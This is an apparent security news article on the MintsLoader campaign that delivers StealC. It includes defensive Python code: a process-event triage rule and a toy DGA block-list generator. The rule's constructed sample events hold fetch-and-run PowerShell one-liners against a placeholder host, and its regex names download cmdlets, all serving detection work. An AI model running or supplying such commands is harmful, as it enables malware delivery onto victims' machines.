MintsLoader Delivers StealC Malware and BOINC in Targeted Cyber Attacks

Threat hunters have detailed an ongoing campaign that leverages a malware loader called MintsLoader to distribute secondary payloads such as the StealC information stealer and a legitimate open-source network computing platform called BOINC.

“MintsLoader is a PowerShell based malware loader that has been seen delivered via spam emails with a link to Kongtuke/ClickFix pages or a JScript file,” cybersecurity firm eSentire said in an analysis.

The campaign has targeted electricity, oil and gas, and the legal services sectors in the United States and Europe, per the company, which detected the activity in early January 2025.

The development comes amid a spike in malicious campaigns that abuse fake CAPTCHA verification prompts to trick users into copying and executing PowerShell scripts in order to get past the checks, a technique that has come to be known as ClickFix and KongTuke.

“KongTuke involves an injected script that currently causes associated websites to display fake ‘verify you are human’ pages,” Palo Alto Networks Unit 42 said in a report detailing a similar campaign distributing BOINC.

“These fake verification pages load a potential victim’s Windows copy/paste buffer with malicious PowerShell script. The page also gives detailed instructions asking potential victims to paste and execute the script in a Run window.”

The attack chain documented by eSentire starts when users click on a link in a spam email, leading to the download of an obfuscated JavaScript file. The script is responsible for running a PowerShell command to download MintsLoader via curl and execute it, after which it deletes itself from the host to avoid leaving traces.

Alternate sequences redirect the message recipients to ClickFix-style pages that lead to the delivery of MintsLoader by means of the Windows Run prompt.
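Both delivery paths described above end the same way: PowerShell is spawned by an unusual parent (the Windows script host that ran the JScript file, or explorer.exe when the victim pastes into the Run dialog) and its command line fetches remote content. The following is an added detection example written for this article, not eSentire's or Unit 42's code; the process-creation events are constructed, the field names are a simplified stand-in for Sysmon Event ID 1 / Windows 4688 data, and the keyword lists are illustrative rather than exhaustive.

```python
"""Triage process-creation events for the two MintsLoader delivery chains:
(a) wscript.exe/cscript.exe (JScript stage) -> powershell.exe with a download,
(b) explorer.exe (Run-dialog paste, ClickFix) -> powershell.exe with a download.
All sample data below is constructed for this example."""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    parent: str    # parent image name, e.g. "wscript.exe"
    image: str     # child image name, e.g. "powershell.exe"
    cmdline: str   # child command line


# Parents that should rarely launch PowerShell with a download in a corporate fleet.
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}   # hosts for .js / JScript droppers
RUN_DIALOG_PARENT = "explorer.exe"              # Win+R "Run" pastes land here
POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe"}

# Download / in-memory execution cmdlets and tools commonly seen in loader one-liners.
DOWNLOAD_RE = re.compile(
    r"\b(curl(\.exe)?|iwr|invoke-webrequest|invoke-expression|iex|"
    r"downloadstring|net\.webclient)\b",
    re.IGNORECASE,
)
HIDDEN_RE = re.compile(r"-w(indowstyle)?\s+hidden", re.IGNORECASE)


def classify(ev: ProcEvent) -> list[str]:
    """Return the list of reasons an event is suspicious; empty list means benign."""
    if ev.image.lower() not in POWERSHELL_IMAGES:
        return []
    reasons = []
    parent = ev.parent.lower()
    if parent in SCRIPT_HOSTS:
        reasons.append("powershell spawned by script host (JScript stage)")
    elif parent == RUN_DIALOG_PARENT:
        reasons.append("powershell spawned by explorer.exe (Run dialog / ClickFix paste)")
    if not reasons:
        return []
    # Require both the odd parent and a fetch; either alone is too noisy to alert on.
    if not DOWNLOAD_RE.search(ev.cmdline):
        return []
    reasons.append("command line fetches remote content")
    if HIDDEN_RE.search(ev.cmdline):
        reasons.append("hidden window requested")
    return reasons


def triage(events: list[ProcEvent]) -> list[tuple[int, list[str]]]:
    """Return (index, reasons) for every event that trips the rule."""
    return [(i, r) for i, ev in enumerate(events) if (r := classify(ev))]


# Constructed sample telemetry (not from the article or any real incident).
SAMPLE_EVENTS = [
    ProcEvent("explorer.exe", "winword.exe", r"winword.exe C:\Users\a\report.docx"),
    ProcEvent("wscript.exe", "powershell.exe",
              'powershell -w hidden -c "curl.exe -o $env:TEMP\\s.ps1 http://example.invalid/x"'),
    ProcEvent("explorer.exe", "powershell.exe",
              'powershell -NoP -W Hidden -c "iwr http://example.invalid/v | iex"'),
    ProcEvent("cmd.exe", "powershell.exe", "powershell -c Get-Date"),
]

if __name__ == "__main__":
    for idx, reasons in triage(SAMPLE_EVENTS):
        print(f"event {idx}: {SAMPLE_EVENTS[idx].cmdline}")
        for r in reasons:
            print(f"   - {r}")
```

Events 1 and 2 are flagged (script-host parent and Run-dialog parent respectively, each with a download); the Word launch and the cmd.exe-spawned `Get-Date` are not. In a real deployment the parent check is the high-signal half of the rule, so it is worth keeping even if the keyword list is tuned down for noise.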

The loader malware, in turn, contacts a command-and-control (C2) server to fetch interim PowerShell payloads that perform various checks to evade sandboxes and resist analysis. It also features a Domain Generation Algorithm (DGA) whose seed value is derived by adding the current day of the month, and uses that seed to create the C2 domain name.
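The defensive significance of a day-of-month seed is that it can take at most 31 values: once the algorithm is recovered from a sample, every domain the loader could ever contact can be precomputed and blocked or sinkholed. The generator below is an added, hypothetical stand-in written for this article to show that enumeration; it is not MintsLoader's algorithm (the article gives no details of it), and the secret string and TLD list are constructed.

```python
"""Enumerate the full domain space of a DGA seeded only by the day of the month.
toy_dga() is a made-up algorithm for illustration, not MintsLoader's."""
import hashlib
from datetime import date

# Constructed values; a real analysis would recover these from the sample.
TOY_SECRET = "example-seed"
TOY_TLDS = ("top", "xyz")


def toy_dga(day_of_month: int, secret: str = TOY_SECRET) -> str:
    """Hypothetical DGA: sha256(secret:day) -> 12 lowercase letters + TLD."""
    if not 1 <= day_of_month <= 31:
        raise ValueError("day of month must be 1..31")
    digest = hashlib.sha256(f"{secret}:{day_of_month}".encode()).digest()
    label = "".join(chr(ord("a") + b % 26) for b in digest[:12])
    tld = TOY_TLDS[digest[12] % len(TOY_TLDS)]
    return f"{label}.{tld}"


def domain_for(d: date) -> str:
    """Domain the (toy) loader would use on a given date: only d.day matters."""
    return toy_dga(d.day)


def enumerate_blocklist() -> set[str]:
    """All domains the toy DGA can ever produce; 31 seeds -> at most 31 domains."""
    return {toy_dga(day) for day in range(1, 32)}


def is_dga_domain(name: str) -> bool:
    """Check a DNS query name against the precomputed set (case-insensitive)."""
    return name.lower().rstrip(".") in enumerate_blocklist()


if __name__ == "__main__":
    today = date.today()
    print(f"today's domain: {domain_for(today)}")
    print(f"full blocklist ({len(enumerate_blocklist())} entries):")
    for name in sorted(enumerate_blocklist()):
        print("  ", name)
```

Because the seed ignores month and year, the same domain recurs on the 15th of every month, which is also why a single day's sinkhole capture lets defenders predict the next reappearance without re-running the malware.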

The attack culminates with the deployment of StealC, an information stealer sold under the malware-as-a-service (MaaS) model since early 2023. It’s assessed to be re-engineered from another stealer malware known as Arkei. One of the notable features of the malware is its ability to avoid infecting machines located in Russia, Ukraine, Belarus, Kazakhstan, or Uzbekistan.

News of the MintsLoader campaign also follows the emergence of an updated version of JinxLoader dubbed Astolfo Loader (aka Jinx V3), which has been rewritten in C++, likely for performance reasons, after its source code was sold off by the malware author Rendnza to two separate buyers, Delfin and AstolfoLoader.

“While @Delfin claims to be selling JinxLoaderV2 unchanged, @AstolfoLoader opted to rebrand the malware and modify the stub to C++ (Jinx V3), instead of using the original Go-compiled binary,” BlackBerry noted late last year.

“Services like JinxLoader and its successor, Astolfo Loader (Jinx V3), exemplify how such tools can proliferate quickly and affordably and can be purchased via popular public hacking forums that are accessible to virtually anyone with an Internet connection.”

Cybersecurity researchers have also shed light on the inner workings of the GootLoader malware campaigns. These campaigns are known to weaponize search engine optimization (SEO) poisoning to redirect victims searching for agreements and contracts to compromised WordPress sites. Those sites host a realistic-looking message board offering a file download that purportedly contains the document the victim was looking for.

The malware operators have been found to make changes to the WordPress sites that cause those sites to dynamically load the fake forum page content from another server, referred to as the “mothership” by Sophos.

GootLoader campaigns, besides geofencing IP address ranges and allowing requests to originate only from specific countries of interest, go further by permitting a potential victim to visit the infected site only once in 24 hours, adding the IP address to a block list after the first visit.

“Every aspect of this process is obfuscated to such a degree that even the owners of the compromised WordPress pages often cannot identify the modifications in their own site or trigger the GootLoader code to run when they visit their own pages,” security researcher Gabor Szappanos said.

The Hacker News
